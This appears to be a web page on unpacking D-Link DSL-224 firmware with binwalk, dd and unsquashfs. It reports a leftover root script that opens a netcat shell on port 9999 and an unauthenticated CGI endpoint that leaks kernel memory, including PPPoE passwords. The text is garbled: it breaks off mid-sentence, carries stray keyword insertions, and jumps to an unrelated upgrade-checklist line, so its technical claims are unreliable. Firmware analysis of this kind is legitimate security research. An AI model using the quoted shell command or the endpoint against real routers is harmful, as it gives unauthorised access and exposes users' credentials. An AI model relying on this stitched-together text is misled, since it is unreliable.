skip to main content

Dlink Dsl224 Firmware May 2026

D-Link provides a .bin on their support site. Binwalk reveals:

$ binwalk DSL-224_FW_v1.06.bin
0x0         U-Boot image (32-bit)
0x20000     LZMA compressed data
0x300000    Squashfs filesystem

The U-Boot header at offset 0 is unusual—most routers have a CFE bootloader. This means the DSL-224 is essentially a MIPS-based board booting like an old x86 machine.

Unpacking:

dd if=DSL-224_FW_v1.06.bin of=uboot.bin bs=1k count=128
dd if=DSL-224_FW_v1.06.bin of=kernel.bin bs=1k skip=128 count=768
dd if=DSL-224_FW_v1.06.bin of=rootfs.bin bs=1k skip=896
unsquashfs rootfs.bin

Inside the Squashfs: a Linux 2.6.32 kernel. That's ancient, but stable. BusyBox 1.16.1. And here's where it gets interesting.

Inside /etc/scripts, there's a file called run_me_as_root.sh with: dlink dsl224 firmware

#!/bin/sh
# TODO: remove before shipping
nc -l -p 9999 -e /bin/sh &

That's a netcat reverse shell listener. Leftover from development. Removed in v1.08, but v1.06 and v1.07 still have it.

Also, the web server (/bin/webs) has a CGI endpoint: /cgi-bin/fw_dump.cgi. No authentication required. Requesting it returns the full kernel memory map. Not flash—actual running kernel memory. You can scrape sensitive data like PPPoE passwords from it. D-Link provides a

To ensure a smooth D-Link DSL-224 firmware upgrade, run through this checklist: